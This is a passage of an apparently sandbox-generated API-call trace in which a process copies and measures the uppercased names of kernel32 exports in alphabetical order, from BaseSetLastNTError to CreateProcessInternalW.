lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.723] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.723] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.723] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.723] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.723] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.723] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.724] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.724] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.724] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.724] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.724] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.724] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.724] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.724] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.724] lstrlenA (lpString="BEEP") returned 4 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.724] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.724] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.724] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.724] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.724] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.724] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.724] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.724] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.724] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.724] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.725] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.725] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.725] lstrlenA (lpString="CANCELIO") returned 8 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.725] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.725] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.725] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.725] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.725] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.725] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.725] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.725] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.725] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.725] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.725] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.725] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.725] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.725] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.725] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.725] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.726] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.726] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.726] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.726] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.726] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.726] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.726] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.726] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.726] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.726] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.726] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.726] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.726] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.726] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.726] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.726] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.726] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.726] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.726] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.727] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.727] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.727] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.727] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.727] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.727] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.727] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.727] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.727] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.727] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.727] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.727] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.727] lstrlenA (lpString="COPYFILEA") returned 9 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.727] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.727] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.727] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.727] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.727] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.727] lstrlenA (lpString="COPYFILEW") returned 9 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.728] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.728] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.728] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.728] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.728] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.728] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.728] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.728] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.728] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.728] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.728] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.728] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.728] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.728] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.728] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.728] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.728] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.728] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.728] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.729] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.729] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.729] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.729] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.729] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.729] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.729] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.729] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.729] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.729] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.729] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.729] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.729] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.729] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.729] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.729] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.729] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.730] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.730] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.730] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.730] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.730] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.730] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.730] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.730] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.730] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.730] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.730] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.730] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.730] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.730] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.730] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.730] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.730] lstrcpyA (in: lpString1=0x36fcbb4, 